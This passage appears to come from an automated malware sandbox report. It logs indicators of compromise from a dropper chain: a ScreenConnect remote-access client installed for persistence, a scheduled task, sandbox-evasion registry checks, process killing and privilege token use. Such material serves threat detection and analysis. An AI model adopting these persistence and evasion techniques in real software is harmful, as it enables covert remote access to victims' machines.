msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\e588be2.msi msiexec.exe File opened for modification C:\Windows\Installer\e588be0.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD} msiexec.exe File opened for modification C:\Windows\Installer\MSI8DD4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8E71.tmp msiexec.exe File created C:\Windows\Tasks\skotes.job 1V40F8.exe File created C:\Windows\Installer\e588be0.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI9008.tmp msiexec.exe File created C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 8932 7036 WerFault.exe 253 3896 7284 WerFault.exe 269 -
System Location Discovery: System Language Discovery 1 TTPs 59 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbfa9a48763748409ab9f84a4b4d1cca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 00f883d031.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d3ca92efa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4C806m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd4b71514b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fire.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e200e74b60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NN9Dd7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 64711675d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cfb5c42bfd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ga70pjP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9a1c193d0b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3dbe003be11c428091b74912c836eb73.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4320ee3d91.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1de1e1e88.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1048c089ab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 57dcd7e51c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e200e74b60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3Z30a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 595994f5cc9c4c769929b462827bc67e.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 64711675d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 70a82b2704.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fire.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kz8ZdyP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p6D27.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 57dcd7e51c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 002e33e6e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2q4507.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cedb729c19.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd4b71514b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language R5B56.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 64711675d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b7a1e2f349.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1V40F8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kz8ZdyP.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1116 PING.EXE 5672 powershell.exe 6028 PING.EXE 2080 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f59c2d6185d8bf0c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f59c2d610000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f59c2d61000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df59c2d61000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f59c2d6100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 595994f5cc9c4c769929b462827bc67e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bbfa9a48763748409ab9f84a4b4d1cca.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 595994f5cc9c4c769929b462827bc67e.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bbfa9a48763748409ab9f84a4b4d1cca.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2652 timeout.exe 4884 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 5756 taskkill.exe 3564 taskkill.exe 6488 taskkill.exe 6748 taskkill.exe 6744 taskkill.exe -
Modifies data under HKEY_USERS 18 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe -
Modifies registry class 39 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings ScreenConnect.WindowsClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 6028 PING.EXE 1116 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6580 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2140 1V40F8.exe 2140 1V40F8.exe 556 skotes.exe 556 skotes.exe 2332 2q4507.exe 2332 2q4507.exe 1412 3Z30a.exe 1412 3Z30a.exe 2336 4C806m.exe 2336 4C806m.exe 2284 NN9Dd7c.exe 2336 4C806m.exe 2336 4C806m.exe 3144 powershell.exe 3144 powershell.exe 3144 powershell.exe 3388 powershell.exe 3388 powershell.exe 3388 powershell.exe 4528 595994f5cc9c4c769929b462827bc67e.exe 4528 595994f5cc9c4c769929b462827bc67e.exe 2820 msedge.exe 2820 msedge.exe 2416 msedge.exe 2416 msedge.exe 1704 kz8ZdyP.exe 1704 kz8ZdyP.exe 400 kz8ZdyP.exe 400 kz8ZdyP.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 4904 msiexec.exe 4904 msiexec.exe 6152 identity_helper.exe 6152 identity_helper.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 7384 9a1c193d0b.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 7652 57dcd7e51c.exe 7652 57dcd7e51c.exe 5704 skotes.exe 5704 skotes.exe 5672 powershell.exe 5672 powershell.exe 5672 powershell.exe 6380 002e33e6e2.exe 6380 002e33e6e2.exe 5960 4320ee3d91.exe 5960 4320ee3d91.exe 5676 64711675d3.exe 5676 64711675d3.exe 7872 7d3ca92efa.exe 7872 7d3ca92efa.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 2416 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe 4324 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2284 NN9Dd7c.exe Token: SeDebugPrivilege 2336 4C806m.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeDebugPrivilege 2012 ga70pjP.exe Token: SeShutdownPrivilege 3744 msiexec.exe Token: SeIncreaseQuotaPrivilege 3744 msiexec.exe Token: SeSecurityPrivilege 4904 msiexec.exe Token: SeCreateTokenPrivilege 3744 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3744 msiexec.exe Token: SeLockMemoryPrivilege 3744 msiexec.exe Token: SeIncreaseQuotaPrivilege 3744 msiexec.exe Token: SeMachineAccountPrivilege 3744 msiexec.exe Token: SeTcbPrivilege 3744 msiexec.exe Token: SeSecurityPrivilege 3744 msiexec.exe Token: SeTakeOwnershipPrivilege 3744 msiexec.exe Token: SeLoadDriverPrivilege 3744 msiexec.exe Token: SeSystemProfilePrivilege 3744 msiexec.exe Token: SeSystemtimePrivilege 3744 msiexec.exe Token: SeProfSingleProcessPrivilege 3744 msiexec.exe Token: SeIncBasePriorityPrivilege 3744 msiexec.exe Token: SeCreatePagefilePrivilege 3744 msiexec.exe Token: SeCreatePermanentPrivilege 3744 msiexec.exe Token: SeBackupPrivilege 3744 msiexec.exe Token: SeRestorePrivilege 3744 msiexec.exe Token: SeShutdownPrivilege 3744 msiexec.exe Token: SeDebugPrivilege 3744 msiexec.exe Token: SeAuditPrivilege 3744 msiexec.exe Token: SeSystemEnvironmentPrivilege 3744 msiexec.exe Token: SeChangeNotifyPrivilege 3744 msiexec.exe Token: SeRemoteShutdownPrivilege 3744 msiexec.exe Token: SeUndockPrivilege 3744 msiexec.exe Token: SeSyncAgentPrivilege 3744 msiexec.exe Token: SeEnableDelegationPrivilege 3744 msiexec.exe Token: SeManageVolumePrivilege 3744 msiexec.exe Token: SeImpersonatePrivilege 3744 msiexec.exe Token: SeCreateGlobalPrivilege 3744 msiexec.exe Token: SeDebugPrivilege 3388 powershell.exe Token: SeCreateTokenPrivilege 3744 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3744 msiexec.exe Token: SeLockMemoryPrivilege 3744 msiexec.exe Token: SeIncreaseQuotaPrivilege 3744 msiexec.exe Token: SeMachineAccountPrivilege 3744 msiexec.exe Token: SeTcbPrivilege 3744 msiexec.exe Token: SeSecurityPrivilege 3744 msiexec.exe Token: SeTakeOwnershipPrivilege 3744 msiexec.exe Token: SeLoadDriverPrivilege 3744 msiexec.exe Token: SeSystemProfilePrivilege 3744 msiexec.exe Token: SeSystemtimePrivilege 3744 msiexec.exe Token: SeProfSingleProcessPrivilege 3744 msiexec.exe Token: SeIncBasePriorityPrivilege 3744 msiexec.exe Token: SeCreatePagefilePrivilege 3744 msiexec.exe Token: SeCreatePermanentPrivilege 3744 msiexec.exe Token: SeBackupPrivilege 3744 msiexec.exe Token: SeRestorePrivilege 3744 msiexec.exe Token: SeShutdownPrivilege 3744 msiexec.exe Token: SeDebugPrivilege 3744 msiexec.exe Token: SeAuditPrivilege 3744 msiexec.exe Token: SeSystemEnvironmentPrivilege 3744 msiexec.exe Token: SeChangeNotifyPrivilege 3744 msiexec.exe Token: SeRemoteShutdownPrivilege 3744 msiexec.exe Token: SeUndockPrivilege 3744 msiexec.exe Token: SeSyncAgentPrivilege 3744 msiexec.exe Token: SeEnableDelegationPrivilege 3744 msiexec.exe Token: SeManageVolumePrivilege 3744 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
